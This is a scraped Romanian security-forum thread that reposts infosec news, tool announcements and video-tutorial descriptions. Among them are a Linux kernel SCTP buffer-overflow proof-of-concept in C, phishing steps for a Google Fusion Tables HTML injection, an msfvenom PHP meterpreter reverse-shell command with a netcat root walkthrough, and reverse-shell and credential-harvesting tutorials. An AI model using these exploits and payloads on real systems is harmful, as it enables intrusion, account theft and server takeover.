Kwelwild

About SQLidot Name: SQLidot Description: SQL Injection/Vulnerability Tool Coder: Kwelwild Design: Sykandar Full Theme Theme Credits: Aeonhack, Mavamaarten, Support™ Made in: Romania, Europe Date/Hour: 13-March-2013@21:15 PM Options: SQL Injection Scanner SQL Injection (3 Methods) -Blind SQLi -Error Based -Bypass Find Admin (Login Page) All Encrypt/Decrypt 2 Subdomain Scanners Images: Scanner: SQL Injection: Find Admin: Encrypt-Decrypt: Subdomain Scanner: Informations: Virus Scan: Screenshot - NovirusThanks Download Link(s): UppIT.com GirlShare

Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow #include <stdio.h> #include <string.h> #include <netinet/in.h> #include <sys/socket.h> #define SCTP_GET_ASSOC_STATS 112 #define SOL_SCTP 132 int main(void) { char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; socklen_t len = strlen(buf); int fd; fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP); getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len); return 0; } Surs?: Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow

Google iti va inlocui toate parolele in viitor. Cum vrea sa iti securizeze conturile Asta e o veste buna pentru domnisoare si o veste "WTF?" pentru domni. Si pe buna dreptate. Google intentioneaza sa schimbe toate parolele utilizatorilor de internet si sa le simplifice astfel incat totul sa fie mai la indemana. La propriu. Business Insider scrie ca Google si cativa baieti de la MIT, pregatesc un inlocuitor de lux pentru parole: inelul. Purtat la deget, acesta ar urma sa functioneze wireless si sa elimine mesajul "introduceti parola pentru a va putea loga". Momentan, suna a SF, insa si Google Glasses sunau la fel in urma cu cativa ani. Business Insider pune insa punctul pe i in acest caz: "Totul suna perfect... atat sa nu va pierdeti inelul". Surs?: Google iti va inlocui toate parolele in viitor. Cum vrea sa iti securizeze conturile - www.yoda.ro

Butonul "Like" de pe Facebook dezvaluie multe lucruri despre internautii care il folosesc, in special informatii despre rasa, varsta, orientarea sexuala, dar si simpatiile lor politice si chiar coeficientul lor de inteligenta. Autorii acestui studiu, publicat luni in Statele Unite ale Americii, au conceput algoritmi care permit crearea unui profil al personalitatii ce dezvaluie informatii personale si intime despre utilizatorii retelei Facebook. Aceste modele matematice sunt exacte in procent de 88% in ceea ce priveste sexualitatea barbatilor si in procent de 95% cand vine vorba de a face distinctia intre persoanele albe si cele de culoare din Statele Unite. Crestinii si musulmanii au fost identificati corect in procent de 82% din totalul cazurilor. Aceiasi algoritmi au putut fi extrapolati si in ceea ce priveste informatiile care permit deducerea orientarii sexuale, daca utilizatorul consuma droguri si daca parintii lui sunt divortati. Aceste date pot fi exploatate in scopuri comerciale pentru a organiza campanii de publicitate si de marketing bine tintite, dar ele pot dezvalui si informatii extrem de personale, afirma David Stillwell, de la Universitatea Cambridge din Marea Britanie, unul dintre autorii acestui studiu, publicat in Proceedings of the National Academy of Sciences (PNAS). Aceleasi informatii pot fi obtinute folosind alte date digitale provenind de pe motoarele de cautare online, posta electronica si telefoanele mobile. Pentru acest studiu, cercetatorii britanici au examinat 8.000 de utilizatori de Facebook in Statele Unite, care s-au oferit sa utilizeze, voluntar, butonul "Like", sa furnizeze informatii pentru alcatuirea profilului demografic si sa participe la testele psihometrice. Predictiile se sprijina in mare masura pe deductiile facute pe baza unei cantitati uriase de date. Astfel, orientarea homosexuala a unui utilizator este dedusa nu pentru ca acesta acceseaza site-uri gay, ci in functie de preferintele sale muzicale si de emisiunile TV pe care acesta le urmareste. Persoanele cu un coeficient de inteligenta (IQ) ridicat apreciaza cel mai adesea emisiuni politice de satira sau filme clasice americane precum "Sa ucizi o pasare cantatoare/ To Kill a Mockingbird" si "Nasul". Utilizatorii cu un coeficient de inteligenta scazut prefera marca Harley Davidson si pe Bret Michaels, solistul trupei rock Poison, foarte populara in anii '80, afirma autorii acestui studiu. Surs?: Studiu: Butonul "Like" de pe Facebook dezvaluie foarte multe informatii despre utilizatori

Description: In this video Jack Crook talking about Digital Forensics and DFIR Challenge for GrrCon 2012. He will show us how to solve GrrCon 2012 Challenge using different tools. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Digital Forensics And Incident Response

Description: Penetration Test pWnOS v2.0 with BurpSuite More infos on : Penetration Test pWnOS v2.0 with BurpSuite | Security is just an Illusion Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Penetration Test Pwnos V2.0 With Burpsuite

PM Sent!

Google Fusion Tables suffers from a cross site scripting vulnerability. # Title: Google Fusion Tables XSS (HTML Injection) Vulnerability # Release Date: 07/03/2013 # Author: Junaid Hussain - [ illSecure Research Group ] # Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com # Vulnerable Application: https://www.google.com/fusiontables/DataSource?dsrcid=implicit ------------------------------------------------------------------------------------------------------------------------------------------------------------- //##### Process: 1. go to https://www.google.com/fusiontables/DataSource?dsrcid=implicit 2. Click "Create empty table" and then click "Next" 3. Click the drop down menu on the Cards1 tab 4. Select "Change Card Layout" and then go to the Custom Tab 5. Remove the HTML code add the following code into the box: <A HREF="http://EVIL_SITE_HERE.COM"><h1>Click here to continue</h1></A> 6. Click save & then Click the share button (top right) and make the link public 7. Click the drop down menu on the Cards1 tab and select the Publish Option 8. Send the Publish Link to victim. ------------------------------------------------------------------------------------------------------------------------------------------------------------- //##### Proof Of Concept: PoC: https://www.google.com/fusiontables/embedviz?viz=CARD&q=select+*+from+19VGTDJasS8NJlbbqnsiDFA_qH7Q95e2dTOKd5RU&tmplt=1&cpr=2 Video: http://www.youtube.com/watch?v=OMCJQ8Atkek&feature=youtu.be ------------------------------------------------------------------------------------------------------------------------------------------------------------- Contact: illSecResearchGroup@gmail.com - Junaid Hussain http://www.illsecure.com ------------------------------------------------------------------------------------------------------------------------------------------------------------- Original: http://www.illsecure.com/2013/03/exclusive-google-fusion-tables-xss-html.html ------------------------------------------------------ Surs?: Google Fusion Tables Cross Site Scripting ? Packet Storm

OFF: Inca putin si acest topic va avea mai multe vizualizari decat cel cu Polonic. ON: Welcome.

Description: Penetration Test pWnOS v2.0 with Sqlmap More InFos on : Penetration Test pWnOS v2.0 with Sqlmap | Security is just an Illusion Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Penetration Test Pwnos V2.0 With Sqlmap

http://www.youtube.com/watch?feature=player_embedded&v=l1YIiOVe6wA Description: CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc. CMS Explorer currently supports module/theme discovery with the following products: Drupal Wordpress Joomla! Mambo And exploration of the following products: Drupal Wordpress Download link - Downloads - cms-explorer - CMS Explorer - Discover the CMS components behind the site - Google Project Hosting Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://www.youtube.com/watch?v=l1YIiOVe6wA Surs?: Cms-Explorer Tool In Backtrack 5 R3

Description: Hey my friends today I made a small tutorial on rooting a web server using metasploit. I hope you know to create metasploit backdoor executables. Here we use the same theory but our payload is php/meterpreter_reverse_tcp. As we need a back connection to our PC we use a reverse connection. So the parameter should be like this. msfvenom –p php/meterpreter_reverse_tcp LHOST=[ local IP ] LPORT=[Local Port ] –f raw We need a raw output so we use the format as raw. Now our php meterpreter reverse connection is created but you have to delete the ‘#’ character at the line 1 to run this script correctly. Okay now run msfconsole and use exploit/multi/handler with the LHOST and LPORT and exploit. Here in this video I have used msfcli which is the same but has advanced features automation features of metasploit. By now our framework should start listening. Next upload our php script to the server and load it. Yeah, you should get a successful meterpreter session opened. We cannot use all the meterpreter commands as our payload is in php, hence we have limited meterpreter commands. Now run shell and there you go. As usual the normal procedure of compiling a local root exploit and executing can be done here. But in this example my kernel is 2.6.24-16 so I will use Linux 2.6 Udev Local Privilege Escalation Exploit Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit . We should run this exploit like this ./exploit PID of Udev-1 Next after successful exploitation our payload in /tmp/run will be executed as root, so in this case I will be using a simple netcat back connection as my payload. That is it just listen using NC and you should get a successful back connection and you are the root. Un0wn_X Thank You. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Rooting A Server Using Metasploit Back Connection

Description: In this video you will learn how to analysis the malicious pdf file using PDFSTreamDumper. PDF Stream Dumper : - This is a free tool for the analysis of malicious PDF documents. It also has some features that can make it useful for pdf vulnerability development. This tool has been made possible through the use of a mountain of open source code. Thank you to all of the authors involved. Has specialized tools for dealing with obsfuscated javascript, low level pdf headers and objects, and shellcode. In terms of shellcode analysis, it has an integrated interface for libemu sctest, an updated build of iDefense sclog, and a shellcode_2_exe feature. RE Corner Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Pdf Analysis With Pdf Stream Dumper

"SUA, taramul supravegheatilor, tara logatilor" Marturiile unui membru Anonymous care a fugit pentru ca era vanat de Guvern In ultimii ani, hackerii de la Anonymous au capatat un capital urias de simpatie din partea internautilor, dar prin actiunile lor ilegale au devenit si cautati international. Intr-un interviu acordat lui Asher Wolf, un activist american, hackerul "American Anon" povesteste ce inseamna pentru el viata in exil si frica de a putea fi prins in orice secunda de autoritati. Din exil, acesta spune: "Ideea de a pleca mi-a venit in momentul in care i-am vazut si pe ceilalti facand asta." "Avand in vedere ca in acest moment NSA construieste programe masine de spionaj pentru fiecare cetatean, nu critic pe nimeni care vrea sa plece din America - taramul celor supravegheati, tara logatilor." Acesta a vorbit si despre decesul lui Aaron Swartz, omul care a adus pe lume Reddit si care s-a sinucis la numai 26 de ani: "Era extenuat, ii era frica, era nesigur de situatia sa, pentru ca era persecutat, iar procurorii deja reusisera sa-l stoarca de bani."

http://www.youtube.com/watch?feature=player_embedded&v=XF8IMJFnsMw Description: Hello! This tutorial shows you how to interact with Exploit Pack. Exploit Pack is an extremely useful tool for testing purposes on high performance networks, it is also the only professional solution that is freely available. Exploit Pack is being actively developed with frequent releases and daily updates and has an ever growning list of features, Exploit Pack is a community effort backed by a dedicated group of people: Everyone is encouraged to contribute while ensures the products always meets professional quality criteria. For more info please visit: Exploit Pack - Security tools Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: [Exploit Pack] - Tutorial, how to use! - YouTube Surs?: [Exploit Pack] - Tutorial, How To Use!

PM Sent!

http://www.youtube.com/watch?feature=player_embedded&v=FUmNZC4WCEo Description: In this video I will show you how to create a custom html temple for phishing attack – if any website is not asking for any logging details so using this temple you can ask for the Username and Password. Same attack you can perform on a social network sites and for more advanced attack you can perform a MITM. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Using SET Credential Harvester On a Site With No Login Form - YouTube Surs?: Using Set Credential Harvester On A Site With No Login Form

Description: In this video I will show you how to perform a Brute-Force Attack on a Windows System for Admin Password and using that password we are going to exploit the windows 7 system, so I’m going to use PSEXEC Metasploit Module for Custom Exe Exploitation. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Metasploit Psexec

Description: In this video I will show you how to upload PHP Reverse shell on a web server. PHP Reverse Shell: - php-reverse-shell | pentestmonkey This tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PHP. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host and port of your choice. Bound to this TCP connection will be a shell. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Upload Php Reverse Shell On A Web Server

Description: In this video I will show you how to solve Jackcr's forensic challenge using Volatility Framework. 1. Who delivered the attack? "Security Department" 2. Who was the attack delivered too? amirs@petro-market.org callb@petro-market.org wrightd@petro-market.org 3. What time was the attack delivered? Mon, 26 Nov 2012 14:00:08 -0600 via phishing email. 4. What time was the attack executed? By the user callb on machine ENG-USTXHOU-148: Downloaded at Mon, 26 Nov 2012 23:01:53 UTC Executed at Mon, 26 Nov 2012 23:01:54 UTC (from IE history fragment, verified with timeline and prefetch entry) By the user amirs on machine FLD-SARIYADH-43: Downloaded at unknown (Visited: fragment in memory without timestamp) Executed at Tue, 27 Nov 2012 00:17:58 UTC (timeline and prefetch entry) 5. What is the C2 IP Address? 58.64.132.141 6. What is the name of the dropper? Symantec-1.43-1.exe 7. What is the name of the backdoor? Gh0st 8. What is the process name the backdoor is running in? svchost.exe via the injected DLL 6to4ex.dll 9. What is the process id on all the machines the backdoor is installed on? ENG-USTXHOU-148 PID 1024 FLD-SARIYADH-43 PID 1032 10. What usernames were used in this attack? callb (password Mar1ners@4655) sysbackup (password T1g3rsL10n5) 11. What level of access did the attacker have? Local Administrator (via sysbackup account) 12. How was lateral movement performed? cmd.exe executed via PSEXEC from ENG-USTXHOU-148 to IIS-SARIYADH-03 PSEXEC was attempted against DC-USTXHOU but was not successful. 13. What .bat scripts were placed on the machines? FLD-SARIYADH-43 system1.bat system2.bat system3.bat system4.bat system5.bat system6.bat ENG-USTXHOU-148 system5.bat IIS-SARIYADH-03 system1.bat system4.bat system5.bat 14. What are the contents of each .bat script? system1.bat – make the c:\windows\webuidirectory and share it as “Z” granting the sysbackup user full permissions. System2.bat – execute gs.exe and output to c:\windows\webui\svchost.dll system3.bat – perform a recursive directory listing of c:\*.dwg and write output to c:\windows\webui\https.dll system4.bat – using winrar, compress the contents of “C:\Engineering\Designs\Pumps\*.dwg” excluding *.dll, writing the resulting rar archive into c:\WINDOWS\webui\netstat.dll using the password hclllsddlsdiddklljh. system5.bat - copies wc.exe from the c:\windows\webui\ directory into the c:\windows\system32\ directory and creates an AT task to execute it at various times. system6.bat – execute various system utilities to gather information on the network. 15. What other tools were placed on the machines by the attacker? PSEXEC (ps.exe) Windows Credentials Editor (wc.exe) WinRAR (ra.exe) ScanLine (sl.exe) gsecdump (gs.exe) 16. What directory was used by the attacker to drop tools? C:\WINDOWS\webui 17. Was the directory newly created or was it there prior to the attack? Newly created for the attack 18. What were the names of the exfiltrated files? netuse.dll system.dll svchost.dll netstat.dll https.dll 19. What did the exfiltrated files contain? netuse.dll – output of various commands executed on ENG-USTXHOU-148 - hashes included system.dll – output of various commands executed on IIS-SARIYADH-03 - no hashes included svchost.dll – output of hash dumping commands on IIS-SARIYADH-03 https.dll – directory listing of C:\Engineering\Designs\Pumps from IIS-SARIYADH-03 netstat.dll – RAR file 20. What time did winrar run? Tue Nov 27 2012 01:11:19 UTC 21. What is the md5sum of pump1.dwg? a48266248c04b2ba733238a480690a1c 22. Which machines were compromised and need to be remediated? ENG-USTSXHOU-148 FLD-SARIYADH-43 IIS-SARIYADH-03 23. Which user accounts were compromised and need to be remediated? callb sysbackup saadmin 24. Are there additional machines that need to be analyzed? No. 25. Describe how each machine was involved PDF: - file:///C:/Users/Administrator/Downloads/Jackcr+Forensic+Challenge+report+-+ver2-20121202-BN.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Jackcr's Forensic Challenge Solutions With Volatility Framework

Google anunta ca administratia americana supravegheza mii de conturi de Internet Agentiile guvernamentale americane, intre care politia federala (FBI), au supravegheat mii de conturi de Internet din 2009 pana in 2012 pentru a impiedica eventualele activitati teroriste, a anuntat gigantul american Google. Google a facut publice in aceasta saptamana presupusele scrisori de "securitate nationala" pe care le-a primit si care corespund unor cereri oficiale de date, in numele legii antiterorism Patriot Act, adoptata dupa atentatele din 11 septembrie 2001. Aceasta este prima data cand o companie privata publica date despre aceste scrisori, foarte criticate de organizatiile de aparare a drepturilor omului. Din 2009 si pana in 2012, compania a primit din partea administratiei intre zero si 999 de cereri. Aceste solicitari vizeaza anual intre 1.000 si 1.999 de conturi, cu exceptia anului 2010, cand cererile au vizat intre 2.000 si 2.999 de conturi, potrivit Google. "Remarcati ca noi publicam plaje de cifre si nu cifre exacte. Aceasta pentru a raspunde cererilor FBI, Departamentului Justitiei si altor agentii (guvernamentale) care se tem ca publicarea unor cifre exacte ar dezvalui informatii despre anchetele in curs", a explicat directorul de securitate al Google, Richard Salgado, pe blogul grupului. Asociatii precum ACLU (American Civil Liberties Union) apreciaza ca aceste scrisori confera prea multa putere administratiei, care poate astfel sa supravegheze conturile de Internet fara mandatul justitiei. Electronic Frontier Foundation (EFF) apreciaza la randul sau ca aceste scrisori sunt "periculoase" deoarece ele genereaza un "abuz sistematic al puterii" de catre FBI. "Este vorba despre o victorie fara precedent a transparentei", au apreciat miercuri pe un blog doi militanti ai EFF, Dan Auerbach si Eva Galperin. In pofida nepublicarii unor date precise, "Google permite sa se faca partial lumina in privinta modului in care administratia americana foloseste cereri secrete de date ale utilizatorilor", afirma ei. "Desi noi continuam sa ramanem in ceata in privinta amplorii si modului in care este aplicata legea, aceste noi date elimina temerile (...) privind un acces generalizat la conturi - cel putin la cele ale Google", au adaugat ei. Surs?: Google anunta ca administratia americana supravegheza mii de conturi de Internet

Description: Tutorial: OWASP Bricks Login page #2 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Owasp Bricks - How To Solve Challenge #4: Log In Page #2

Description: In this video I will show you how to use Perl Reverse Shell for unix system. This tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PERL. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host and port of your choice. Bound to this TCP connection will be a shell. Perl Reverse Shell: - http://pentestmonkey.net/tools/perl-reverse-shell/perl-reverse-shell-1.0.tar.gz Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Web Perl Reverse Shell

http://www.youtube.com/watch?feature=player_embedded&v=jjRaS5p7GN0 Description: Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable. https://github.com/stephenfewer/ReflectiveDLLInjection Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://www.youtube.com/watch?v=jjRaS5p7GN0 Surs?: Reflective Dll Injection Metasploit Module